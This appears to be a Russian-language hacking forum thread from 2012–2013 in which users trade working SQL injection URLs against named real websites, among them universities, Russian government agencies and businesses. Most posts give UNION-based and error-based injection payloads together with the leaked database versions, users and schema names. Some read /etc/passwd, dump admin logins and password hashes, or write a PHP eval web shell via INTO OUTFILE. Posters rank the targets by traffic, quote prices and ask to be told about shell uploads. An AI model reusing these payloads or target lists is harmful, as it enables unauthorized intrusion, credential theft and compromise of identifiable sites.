admin@localhost5.0.45-enterprise-gpl-loggendiag_cms
file_priv=Y>>>>>>>
http://www.generationendialog.de/aktuell.php?id=9999.999+union+select+null,null,'He llo%20Word',null,null,null,null%20into%20outfile%2 0'/home/.sites/64/site41/web/wp-content/themes/twentyten/blesse.txt'+--+
>>>>>>>
http://www.sroi-online.com/wp-content/themes/twentyten/blesse.txt
(много сайтов .de на пузомерки не чекал)
2)
Code:
http://www.socialworkhallofdistinction.org/honorees/item.php?id=39%20LIMIT%201,1%20UNION%20ALL%20SELEC T%20NULL,%20NULL,%20NULL,%20NULL,concat(user(),ver sion(),database()),%20NULL,%20NULL,%20NULL,%20NULL ,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,% 20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20 NULL,%20NULL,%20NULL
Code:
_ttp://www.nacso.org/news.php?id=4'%20union%20select%201,version(),3,4--+
Code:
ht tp:/ /www.uprtou.ac.in/inner.php?conf=-1198+UNION+SELECT+1,2,3,4,version( ),6 ,7,8,9,10,11,12,13,14,15,16--
Code:
http:/ /www.uprtou.ac.in/inner.php?conf=-1198+UN ION+SELECT +1,2,3,4,load_file('/etc/pas swd'),6,7,8,9,1 0,11,12,13,14,15,16--
FunOfGun
14.12.2012, 17:12
Поздравьте с первым уловом
Яндекс тИЦ (CY) 40
Alexa Rank 4,510,468
Google PageRank (PR) 2
Code:
http://www.deshe vletut.ru/brand.php?id=0&id_razdel2=-22%20union%20select%201,version(),3%20--
Яндекс тИЦ (CY) 130
Alexa Rank 776,218
Google PageRank (PR) 3
Code:
http://www.mediums earch.com/catalog/item.php?id=-5895%20union%20select%20version(),2,3,4,5
Code:
http://www.roglianoweb.it/app/community/dettaglio_squadra. php
?id_squadra=-7+union +select+1,CONCAT_WS(CHAR(32,58,32),user(),databas e(),version() ),3,4-
Code:
http://www.fapsparma.it/faps-prodotti.php?pagina=2&catalogo=-12+union+select+1,2,CONCAT_WS(CHAR(32,58,32),user( ),database(),version()),4,5--
Code:
http://www.stockbazzar.com/buy.php?Id=999999.9+union+select+1,table_name,3,4, 5,6,7,8+from+information_schema.tables+where+table _schema!=0x696e666f726d6174696f6e5f736368656d61+--+
Code:
_ttp://spbf.pt/cat.php?catid=-4+union+select +1,CONCAT_WS%28CHA R%2832,58,32%29,u ser%28%29,data base% 28%29,version%28%29% 29,3- -
qwwertty
18.12.2012, 19:25
Code:
eendata@173.201.196.1
5.0.92-log
_ttp://creationcare.org/category.php?blog=1&category=36+union+select+1,2,database(),4,user(),6 ,7,8,9,10+--+
Вывод внизу страницы.
Антибоян>>> _http://www.google.ru/search?q=creationcare.org+site%3Aforum.antichat.ru
Code:
ttp://mobilelocalnews.com/partners.php?id=131+and+1=2+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,user%28%29,database%28%29,vers ion%28%29,50,51,52,53,54,55,56,57,58,59,60,61,62,6 3,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79, 80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96 ,97,98,99,100,101,102,103,104,105,106,107,108,109, 110,111,112,113+--+
qwwertty
22.12.2012, 02:44
Code:
_ttp://www.dracoders.com/games.php?id=7+and+1=2+union%28select+1,2,%28user% 28%29%29,%28database%28%29%29,%28version%28%29%29% 29+--+
_ttp://www.google.ru/search?q=dracoders.com+site%3Aforum.antichat.ru
Code:
_ttp://www.kbnusa.com/prod_detail.php?m=e&id=9+and+4=9+unIon+select+1,2,3,4,convert%28databa se%28%29+using+latin1%29,6,convert%28version%28%29 +using+latin1%29,convert%28user%28%29+using+latin1 %29,9,10,11,12,13,14,15,16,17,18,19,20+--+
Code:
_ttp://www.micatrone.se/prod_detail.php?secID=1&lang=gb&catID=24&main=36&id=15+and+1=2+union%28select+1,2,3,4,5,6,database% 28%29,user%28%29%29+--+
Вывод в тайтле // Кажись фильтрует version()
FunOfGun
23.12.2012, 14:04
Нашел неделю назад, не чекал, но врядли что-то прикрыли.
Code:
http://familynewsabout.com/aboutBook.php?id=-3241%20union%20select%201,2,3,4,version(),6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33%20--
http://www.gordonsmithguitars.com/products/category.php?id=-1%20union%20select%201,version(),3,4,5%20--
http://www.bzpower.com/story.php?ID=-4541%20union%20select%201,2,3,4,5,6,7,version(),9, 10,11,12,13,14%20--
http://www.miamacdonald.com/a.php?id=-42%20union%20select%201,version(),3,4,5,6%20--
http://www.henleystandard.co.uk/news/news.php?id=799582%20union%20select%201,2,3,4,5,ve rsion(),7,8,9,10,11,12%20--
http://www.norcotek.com/category.php?id=-8%20union%20select%201,version(),3,4,5,6%20--
qwwertty
24.12.2012, 04:45
Protocoler said:
Немогу найти количество полей в ручную (
Code:
http://www.route66.com.ua/index.php?id=59
Code:
_ttp://www.route66.com.ua/index.php?id=59+and+4=9+union+select+1,2,3,4,conca t_ws%28version%28%29,user%28%29,database%28%29%29, 6+--+
http://pkteks.kz/index.php?opt=cat&part=-61%20and%201=2%20union%20select%201,concat_ws(char (58),@@version,user(),database()),3,4,5--
5.0.95 pkteksk_usex@server3.hlpdns2.kz pkteksk_db
в наличии имеются таблицы admin, users
PHP:
http://www.sova72.ru/index.php?option=com_sova&task=rent&ID=-555+union+select+1,2,3,4,5,6,7,8,541564644,10,11,1 2,13,14,111,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33--
tic80 pr4
ErnanCortes
28.12.2012, 13:21
http://dkm.ru:80/default.php?rubrica=5&D=27&M=11&Y=2011&id=340
тиц 170 pr3
Code:
http://www.fmdanmark.dk/debatf orum/show_topic .php?start=1110&e nd=10&id=-702 5+uni on+s elect+1,2,3,co ncat_ws(char(58), @ @version,user(),databa se()),5,6--
Code:
h??p://www.pizzahut-lb.com/pizzahut/pizzahutmenu.php?catid=-3+union+se lect+1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),datab ase(),version())--
cleper.ru
PHP:
http://www.cleper.ru/news/description.php?n=1016%27+or+1+group+by+concat%28% 28select+version%28%29%29,0x00,floor%28rand%280%29 *2%29%29having+min%280%29+or+1--+
5.1.66
(CY)375
==============================================
ippp.ru
PHP:
http://www.ippp.ru/content.php?content=forumadd&tree=11&id=976&subid=979+or+1+group+by+concat%28%28select+version %28%29%29,0x00,floor%28rand%280%29*2%29%29having+m in%280%29+or+1--+
5.1.41-log
(CY)70
==============================================
zhuravlev.info
PHP:
http://zhuravlev.info/modules.php?name=Eponyms_Web&op=article&rg=522&k=521&id=860+or+1+group+by+concat%28%28select+version%28 %29%29,0x00,floor%28rand%280%29*2%29%29having+min% 280%29+or+1--+
5.1.66
(CY)230
==============================================
8kob.ru
PHP:
http://www.8kob.ru/note.php?id=976+or+1+group+by+concat%28%28select+v ersion%28%29%29,0x00,floor%28rand%280%29*2%29%29ha ving+min%280%29+or+1--+
5.1.41-log
(CY)10
==============================================
banksinfo.kiev.ua
PHP:
http://www.banksinfo.kiev.ua/analitics?id=982+or+1+group+by+concat%28%28select+ version%28%29%29,0x00,floor%28rand%280%29*2%29%29h aving+min%280%29+or+1--+
5.1.61
(CY)90
==============================================
Code:
_?tp://www.lnyp.org/releasesdetails.php? pubid=-16+union+select+1,2,3,CO NCAT_WS(CH AR(32,58,32),user(),dat abase(),ve rsion()),5,6,7,8--
pr7
Code:
http://www.cput.ac.za/index.php?option=com_jumi&fileid=11&cid=235+union+select+1,version(),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22--
Code:
http://avto.kz/modules/news/news.php?id=-5'+union+select+1,2,concat(user(),0x3a,database(), 0x3a,version()),4,5,6,7,8,9+--+
avto@localhost:avto:5.5.25-log
http://www.tv[antichat]sale.ru/catalog/-men%27+union+select+1,2,3,4,5,version%28%29,7,8+--+
Code:
http://www.alkayanlb.net/ar/activitydetails.php?id=-112+union+select+1,CONCAT_WS(CH AR(32,58,3 2),user(),da tabase(),version()),3,4,5,6--
FunOfGun
07.01.2013, 01:12
http://support.iquest.net/new.php?id=-20'+union+select+1,2,3,4,@@version,6,7,8+--+
http://www.iec.org.af/eng/content.php?id=1&cnid=-5+/*!union*/select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14+--+
http://www.kingsway-tyres.co.uk/branch_details.php?id=-8+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21+--+
http://www.worstpreviews.com/headline.php?id=-15131+union+select+1,@@version,3,4,5,6,7,8,9,10,11 ,12+--+
http://www.hkyongnuo.com/e-detail.php?ID=-288+union+select+1,@@version,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40+--+
http://www.goldeneyevault.com/viewfile.php?id=-104+union+select+1,2,3,4,5,6,7,8,9,@@version,11,12 ,13+--+
Code:
http://www.chemalylighting.com/modernlighting.php?catid=-2+union+select+1,2,3,4,CONC AT_WS(CH AR(32,58,32),u ser(),datab ase(),versi on()),6--
Атомный Страховой Брокер (тИЦ: 40 / PR: 3)
Code:
Atombroker.ru/news/?t=3&id=-5093+union+select+1,group_concat(concat_ws(char(32 ,58,32),login,pwd)),3+from+user_list--+m
Code:
http://www.mega-aa.com/newsdetails.php?cid=-3+union+select+1,databas e%28%29,3,4,5,6,ve rsion%28%29,us er%28%29--
nemaniak
09.01.2013, 02:41
shebenka.su ТИЦ-240
Code:
www.shebenka.su/index.php?menu_id=12&type_id=2&subtype_id=626&item_id=-79791+union+select+1,2,3,4,5,concat_ws(0x3a,versio n(),user(),database()),7,8,9,0,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24+--+&step=2
Code:
4.0.27:root@zvm30.host.ru:ipkshop
Code:
http://www.syriacorthodox-mlb.org/news.php?id=-793+union+select+1,CONCAT_WS%28CHAR%2832,58,32%29, user%28%29,database%28%29,version%28%29%29,3,4,5,6--
asmarpr1_syriac@localhost : asmarpr1_syriac : 5.1.66-cll
gosnadzor.ru Федеральная служба по экологическому, технологическому и атомному надзору России
PHP:
http://szap.gosnadzor.ru/news/terrnews.html?id=828+or+1+group+by+concat%28%28sel ect+version%28%29%29,0x00,floor%28rand%280%29*2%29 %29having+min%280%29+or+1--+
Яндекс тИЦ (CY) 3500
Google PageRank (PR) 6
5.1.66
Code:
http://www.belifrost.com/p roducts.php?id=-1 4+u nion+sel ect+1, C ONCAT_WS%28C HA R%2832,58,32%29,user%28%29,database%28%29,version% 28%29%29,3,4,5,6,7, 8--
asmarpr1_belif@localhost : asmarpr1_belifrost : 5.1.66-cll
http://www.windward-islands.net/crewed/yacht-us.php?ID=-254+union+select+1,2,3,login,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19+FROM+Admin+limit+0,1--+
PR:4
ТИЦ:10
Code:
http://www.360.is/index.php?pid=261&cid=-2141+union+select+1,2,3,4,5,6,CONCAT_WS%28CHAR%283 2,58,32%29,user%28%29,datab ase%28 %29,versi on%28%29%29,8,9,10, 1 1,12,13,14--
Code:
http://www.stock-software.com/news/subcategory.php?subcatid=186+and+1=2+union+select+ 1,user%28%29,3,4+--+
http://www.wholesalewigs.net/ViewItem.php?ItemID=219%27+and+1=2+UNION%20SELECT% 201,2,3,4,5,user%28%29,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24+--+&subbrand=20&brandname=Revlon&brandid=16&brandtype=1&source=index.php
Code:
h ttp: //www.firstgulf .com/search-d etails.ph p?id=-23+un ion+select+1,ve rsion(),u ser(),4,da tabase(),6,7,8,9,10,11--
FunOfGun
16.01.2013, 23:03
Code:
http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15+--+
http://www.dialysisunits.com/unit.php?id=-12552+union+select+1,@@version,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37+--+
http://landscrona.ru/media/index.php?id=-3594+union+select+1,2,3,@@version,5,6,7,8,9,10,11, 12,13,14,15+--+
http://www.pcidatabase.com/vendor_details.php?id=-606+union+select+1,2,3,4,@@version,6,7,8,9,10,11,1 2,13,14,15+--+
Га-Ноцри
17.01.2013, 03:26
Платная модульная cms. Множественные уязвимости. До исходников добраться не получилось для полноценного репорта, поэтому только самое критичное(хотя и не особенно ее покупают, судя по всему ).
sql-inj в каком-то из скриптов сбора статистики.
Request Headers:
Host:www.jcms.ru
X-Forwarded-For: 127.0.0.1')on duplicate key update h=(select 1 from(select count(*),concat((select(select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)h)#
Response Content:
Software error:
DBD::mysql::st execute failed: Duplicate entry '5.0.901' for key 1 at /MySQL.cgi line 12.
sql-inj в демо-админке:
PHP:
http://demo.jcms.ru/cgi-bin/admin.cgi?login=demo&password=demo&action=photogallery_photogallery_edit&JCMSPhotoGalleryAlbumId=-3' union select 1,version(),3,4,5,6,7,8,9,10+--+h
Главная админка http://jcms.ru/cgi-bin/admin.cgi
Разработчик уведомлён, реакции не последовало.
http://www.wellboat-spb.ru/img/logo.jpg
подыскивая себе водный транспорт, наткнулся на это...
http://www.wellboat-spb.ru/caters.php?id=-20%20and%201=2%20union%20select%201,concat_ws(0x3a ,version(),user(),database(),@@version_compile_os) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28%20--
5.0.77-log wellboat_spb@localhost wellboat_spb pc-linux-gnu
FunOfGun
19.01.2013, 00:12
http://www.asra.com/e-news.php?id=-2+union+select+1,@@version,3,4,5,user()+--+ //root
http://www.casatuscany.com/about/page.php?id=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20+--+ //4.1
http://www.bbkingblues.com/bio.php?id=-2388+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52+--+ //4.1
http://www.carkitinc.com/carkit2.php?id=-12+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13,14,15,16,17+--+
http://www.i-teco.ru/news-arh.php?id=999999.9' union all select (select concat(0x27,0x7e,unhex(Hex(cast(wpb_users.user_log in as char))),0x5e,unhex(Hex(cast(wpb_users.user_pass as char))),0x5e,unhex(Hex(cast(wpb_users.user_email as char))),0x5e,unhex(Hex(cast(wpb_users.user_nicenam e as char))),0x27,0x7e) from `structure_i`.wpb_users limit 0,1) ,0x31303235343830303536,0x31303235343830303536-- a
http://brown.edu/scs/undergrad/catalog/course.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(version() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
// 2 поста подряд с разницей в пару часов
// Я за тебя объединять должен ?
// BigBear
извиняй
http://www.ku.edu/ - The University of Kansas
Яндекс тИЦ (CY): 350
Google PageRank (PR): 7
boolean-based blind
Code:
http://www.ku.edu/academics/?school=1')+and+1=1+and+(''='
http://www.ku.edu/academics/?school=1')+RLIKE+IF(1=1,0x4d7953514c,0x28)+and+(' 1'='1
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 4.1.13-standard
Яндекс тИЦ (CY) 550
Google PageRank (PR) 6
http://www.world-history.ru/persons_about.phtml?Id_article=999999.9 union all select (select concat(0x27,0x7e,unhex(Hex(cast(users.login as char))),0x5e,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `history`.users limit 1,1) --
На сайте присутствует WAF и 3-5к трафика
Code:
http://www.lingvotech.com/index.php?section=docs&page=1&id_refer=6356%0dand(extractvalue(1,concat(0x3a,(se lect+/*!table_name*/+from+information_schema.`tables`+/*!where*/+table_schema=0x617634395f6c696e67766f+limit+0,1)) ))#
Version: 5.1.66-cll
Database: av49_lingvo
User: av49_lingvo@localhost
CY - 160
PR - 0
raptor.f22
30.01.2013, 02:53
Скуля:http://www.numismat-invest.ru/aukcion.php?id=0'+union+select+1,2,3,4,5,concat(0x 7e,version(),0x7c,user(),0x7c,database(),0x7e),7,8/*
version: 5.0.45-community-nt-log
user:1gb_niko@10.0.2.2
database: 1gb_niko
GooglePR: 1
YandexCY:10
Скуля:http://www.mmc-rspp.ru/bistubiseng.php?id=0'+union+select+1,2,3,concat(0x 7e,version(),0x7c,user(),0x7c,database(),0x7e),5,6 ,7+--+
version: 5.1.65
user:admin_mmtrours@localhost
database: admin_cmsmmcrspp
GooglePR: 3
YandexCY:50
Скуля:http://filerootspeed.ru/post.php?id=0'+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,concat(0x7e,version(),0x7c,user(),0x7c, database(),0x7e),16,17+--+
version: 5.1.66-cll
user:exarh758_dor1@localhost
database: exarh758_filerootspeed
GooglePR: 0
YandexCY:0
Скуля:http://www.blenheims.co.uk/leaseholdersandresidents/details.php?id=0+union+select+1,2,3,concat(0x7e,ve rsion(),0x7c,user(),0x7c,database(),0x7e)
version: 5.1.66-cll
user:groupbh_user@localhost
GooglePR: 1
YandexCY:0
Яндекс тИЦ (CY) - 2000
Google PageRank (PR) - 6
http://bards.ru/' or 1=convert(int,@@version) and '1'='1
http://bards.ru/' or 1=convert(int,(char(126)+(select distinct top 1 table_name from (select distinct top 77 table_name from information_schema.tables order BY table_name ASC) sq order BY table_name DESC)+char(126))) and '1'='1
Code:
http://mercerproducts.com.au/details.php?id=-23+union+select+1,version(),3,4,5--
PHP/5.2.13-0.dotdeb.0
5.0.51a-24+lenny5
adzmer043@localhost
richardhayes
raptor.f22
02.02.2013, 18:37
Скуля:http://www.satcommobil.com/rentals.php?id=0+union+select+1,concat(0x7e,versio n(),0x7c,user(),0x7c,database(),0x7e),3,4,5,6
version: 4.1.24-log
user:satcommobil@68.178.254.198
database: satcommobil
Домен: www.satcommobil.com
GooglePR: 0
YandexCY:0
Скуля:http://telefon.sputnik-video.ru/index.php?id=0+union+select+1,2,3,4,5,6,concat(0x7 e,version(),0x7c,user(),0x7c,database(),0x7e),8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34+--+
version: 5.0.96-community-log
user:sputnik@localhost
database: sputnik_test
Домен: telefon.sputnik-video.ru
GooglePR: 2
YandexCY:0
Скуля:http://ausasustainingmembers.searchablelisting.com/viewDetails.php?id=0+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,concat(0x7e,version(),0x7c,use r(),0x7c,database(),0x7e),17,18
version: 5.0.96-log
user:dbo448644008@74.208.16.168
database: db448644008
Домен: ausasustainingmembers.searchablelisting.com
GooglePR: 4
YandexCY:0
Скуля:http://www.experiencedevelopment.org/news_stories_detail.php?id=0+union+select+1,2,conc at(0x7e,version(),0x7c,user(),0x7c,database(),0x7e ),4
version: 5.0.77
user:expdev@localhost
database: experiencedevelopment
Домен: www.experiencedevelopment.org
GooglePR: 5
YandexCY:0
Скуля:http://www.jpscu.com/page.php?id=0'+union+select+1,concat(0x7e,version( ),0x7c,user(),0x7c,database(),0x7e),3/*
version: 4.1.22
user:jpscocu@localhost
database: jpscu
Домен: www.jpscu.com
GooglePR: 1
YandexCY:0
// СГЕНЕРИРОВАНО МОДЕРАТОРОМ BigBear
// У меня терпение не железное...
Code:
http://www .uls.or .ug/details.php?load=uls&id=-23+uni on+select+1,2,3,4,5,version(),7,user(),9,10,11,12, 13,14,15,16,database()--
5.1.66-cll
law2012_koleman
law2012_sindtalo@localhost
http://russianamerica.com/common/arc/TV_2.php?header=y&id=999999.9' union all select (select concat(0x27,0x7e,unhex(Hex(cast(users.e_mail as char))),0x5e,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `cmn`.users limit 0,1) ,0x31303235343830303536 and 'x'='x
100к юзеров
http://russianamerica.com/users/
Code:
http://www.msufoundation.com/news/mprint/image.php?event= -1+union+select+1,2,3,4,@ @version,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28--
4.1.14
South Africa Express Petroleum
Code:
http://expresspetroleum.co.za/page.php?id=-3+union+select+1,2,3,4,5 ,6,7,co ncat_w s (0x3a,version( ),user(),d atab ase()),9,10--
5.1.41-3ubuntu12.10:express@localhost:express
тИЦ 5500
PR 9
http://www.nlr.ru/cms_nlr/md/vid_news_md.php?id=1680 LIMIT 0,1 UNION ALL SELECT NULL,NULL,CONCAT(0x3a646c6d3a,IFNULL(CAST(activ AS CHAR),0x20),0x207C20,IFNULL(CAST(date_zgr AS CHAR),0x20),0x207C20,IFNULL(CAST(dop_inf AS CHAR),0x20),0x207C20,IFNULL(CAST(email AS CHAR),0x20),0x207C20,IFNULL(CAST(fname AS CHAR),0x20),0x207C20,IFNULL(CAST(id AS CHAR),0x20),0x207C20,IFNULL(CAST(id_creator AS CHAR),0x20),0x207C20,IFNULL(CAST(id_podr AS CHAR),0x20),0x207C20,IFNULL(CAST(id_staff AS CHAR),0x20),0x207C20,IFNULL(CAST(login AS CHAR),0x20),0x207C20,IFNULL(CAST(mname AS CHAR),0x20),0x207C20,IFNULL(CAST(nick_podr AS CHAR),0x20),0x207C20,IFNULL(CAST(pass AS CHAR),0x20),0x207C20,IFNULL(CAST(sname AS CHAR),0x20),0x207C20,IFNULL(CAST(tel AS CHAR),0x20),0x207C20,IFNULL(CAST(type AS CHAR),0x20),0x3a6271793a),NULL,NULL FROM guk_cms_nlr.users#
http://www.leontief-centre.ru/news/news.php?news_id=455
http://analitika.kamdolina.ru/news.php?news_id=59
http://www.spbtei.ru/news/news.php?news_id=110
http://indianrays.com/technology_details.php?news=Porn,%20gambling%20web sites%20safer%20than%20search%20engines,%20social% 20networking%20sites&id=-12+union+select+1,2,user(),4,5,6,7,8,9,10,11--
если верить cypr.com, на том ip 100 сайтов.
ЗЫ кто зальется - отпишите в пм)
Code:
http://www.leci.ie/course-details.php?id=-23+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11--
http://www.aoifeonline.com/news.php?id=9999999+UNION+SELECT+1,2,concat_ws(0x3 a,version(),user(),database()),4,5,6,7,8+--+
http://www.moslerauto.com/news.php?id=9999+UNION+SELECT+1,concat_ws(0x3a,ver sion(),user(),database()),3,4,5,6,7,8,9,10,11,12,1 3+--+
pr5
www.islandconservation.org/news/article.php?id=17+union+select+1,2,version(),4,5,6 ,7,8--
ЗЫ кто зальется стукните в пм
ЗЫЫ скиньте мануал как скулю 4 версии раскручивать без информейшн схемы
www.gvox.com/news.php?id=17+group+by+7--
nemaniak
13.02.2013, 15:57
ssristories.com ~75k трафа
Code:
ssristories.com/show.php?item=-4339+union+select+1,concat_ws(0x3a,version(),user( ),database())+--+
Code:
4.0.27--maxd0-log:dbo169558735@74.208.16.82:db169558735
imamreza.net PR-5 ~4k трафа
Code:
www.imamreza.net/eng/imamreza.php?id=-6673)+union+select+1,concat_ws(0x3a,version(),user (),database()),3,4,5+--+
Code:
5.0.75-log:imamrezanet@localhost:imamrezanet
socialwork.wayne.edu PR-5 ~4.5k трафа
Code:
socialwork.wayne.edu/faculty/bio.php?id=44814+and+5=substring(version(),1,1)+--+
stg.brown.edu PR-6 ~4k трафа
Code:
www.stg.brown.edu/projects/CreativeNonfiction/page_display.php?id=1000085+union+select+1,2,3,4,c oncat_ws(0x3a,version(),user(),database()),6,7,8,9 +--+
Code:
4.1.22:prospect@localhost:prospect
тИц : 20
PR : 7
http://www.bbkingblues[dot]com/bio.php?id=-2342+union+select+1,2batabase(),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52
Админка : /admin
Есть возможность вывода таблиц - есть таблица с пользователями и заливка шелла .
PR : 7
http://www.columbiamnc.org/bio.php?id=-3+union+select+1,2,3,4,5,6,concat(user,ox3a,passwo rd),8,9,10,11,12,13,14,15+from+login
http://www.nabokovmuseum.org/news.php?id=-260+union+select+1,concat(user_login,0x3a,user_pas s),3,4,5,6,7+from+wp_users
Стоимость сайта : 146$
Но пароль надо брутить ( маленькая защита от любителей халявы ).
http://www.moreanartscenter.org/news.php?id=-3122+union+select+1,concat(login_username,0x3a,log in_password,0x3a,login_email),3,4,5,6,7,8,9,10,11, 12+from+login+limit+0,1
Админка : http://www.moreanartscenter.org/admin/login.php
http://www.cac-acc.org/news.php?id=-108+union+select+1,email,3,4,5,6,7,8,9,10,11,12,13 ,14,15+from+7t_saoluis
Цена : 156$
Вывел не все таблицы!
http://foros.tneu.edu.ua/news.php?id=-3857+union+select+1,login,3,4,5,6,7,8+from+login
http://inter-climat.com.ua/news.php?id=-7+union+select+1,'%3C?php%20eval($_REQUEST[cmd]);?%3E',3,4,5+from+mysql.user+into+outfile+'D:%5CP EiD%5Cexternal.txt'--
заливка шела парва есть
kinoafisha.ru, тиЦ 375, пр 4
Code:
http://www.kinoafisha.ru/wf/branch.php?id_br=-797515+union+select+version(),2,3,4,5,version(),7, 8,9,10,11,12--
5.1.66-cll
Code:
http://www.veinlistings.com/link.php?id=-5+union+select+1,group_concat(username,0x3a,passwo rd),3,4,5,6+from+admin--+m
Красноярский Городской Сайт
Code:
http://www.kgs.ru/dom/index.php?street_id=0&price=&search=&topic_id=0&city_id=0&district_id=0&metro_id=99999999*(select+min(0)+from+(select+@:=1 +union+select+2)x+group+by+concat((select+version( )),0x0,@:=!@))
Яндекс тИЦ (CY) 325
Alexa Rank 316,685
Google PageRank (PR) 4
Кто зальется, отпишите в личку
Га-Ноцри
27.02.2013, 19:05
ТИц 0; PR 4; DMOZ;
PHP:
http://www.1000websitetools.net/wrong_description_report.php?id=1"/**//*!union/**/select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16*/--+h
ТИц 0; PR 3;
PHP:
http://www.greatcapevacations.com/view_details.php?propid=1'/**//*!'ololo'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17,1 8,19,20,21,22,23*/--+h
Code:
http://bee-network.co.za/bee_news.php?id=-19+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8--
5.1.66-0+squeeze1:beehne_1@www74.jnb2.host-h.net:bee_network
Code:
http://stargaze.footholds.net/product.php?productid=-6+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,CONCAT_WS%28CHAR%2832,58,32%29,us er%28%29,database%28%29,version%28%29%29,21,22,23, 24,25--
Code:
http://www.darknagar.ru/ru/ press.php?sec tion=reviews&id=-23+un ion+select+1,2,3, 4,5,6,ve rsion(),8,9,10,11--
ТИЦ 325, ПР5
PHP:
http://www.prosveshenie.tv/index.php?id=3&item=-17+union+select+1,version(),3,4,5,6,7,8,9,10,11--
ПР3
PHP:
kosmetika.by/news.php?mode=show&id=-17+union+select+1,2,3,version(),5,6--
ТИЦ130, ПР3
PHP:
http://www.adm.ua/tech_view.php?id=-17+union+select+1,2,3,4,5,6--
ТИЦ180
PHP:
http://www.mmk6.oblzdrav.ru/news.php?id=-17+union+select+1,2,version(),4,5--
ТИЦ20. ПР5
PHP:
http://aviabilet.by/add_item.php?id=-17+union+select+version(),2,3--
Code:
http://www.alena-oil.ru/index.php?id=-36+Union+SEleCT+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Code:
http://www.bowtieoverdrives.com/catalog/catalog_inc/viewitem.php?ITEMID=-9+union+select+1,ve rsion(),3,4,5,datab ase(),7,user( ),9,10,11,12, 13,14,1 5--
nemaniak
10.03.2013, 15:29
huecu.org PR-5
Code:
https://www.huecu.org/otherpage.php?pageID=-38+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,0,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26+--+
Code:
5.0.95-rs-log:mindfire_huecu@localhost:web
socialchamber.com PR-5
Code:
www.socialchamber.com/mod/chamber/view.php?news_id=-1048+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,concat_ws(0 x3a,version(),user(),database()),12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44+--+
Code:
5.0.96-community-log:socialch_user1@localhost:socialch_elgg
asiamediajournal.com PR-5
Code:
www.asiamediajournal.com/executive.php?id=-527+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,vers ion(),user(),database()),9,0,11,12,13,14,15,16+--+
Code:
5.0.22:mediaroute26@localhost:mediaroute26_com_-_amj
Code:
http://www.magink.com/page. php ?id=-7+union+select+1,concat_ws(0x3a,ver sion (),user(),database()),3,4,5,6,7,8,9,1 0,11,12 ,13--
Code:
5.1.68-cll:maginka_magink@localhost:maginka_magink
Официальный сайт Московской торгово-промышленной Палаты
moslogistika.mostpp.ru
PHP:
http://moslogistika.mostpp.ru/news.php?id=-14+union+select+1,2,3,4,version%28%29,6,7,8--+
4.0.27
Яндекс тИЦ 1800
Google Page Rank 6
pr - 7
Code:
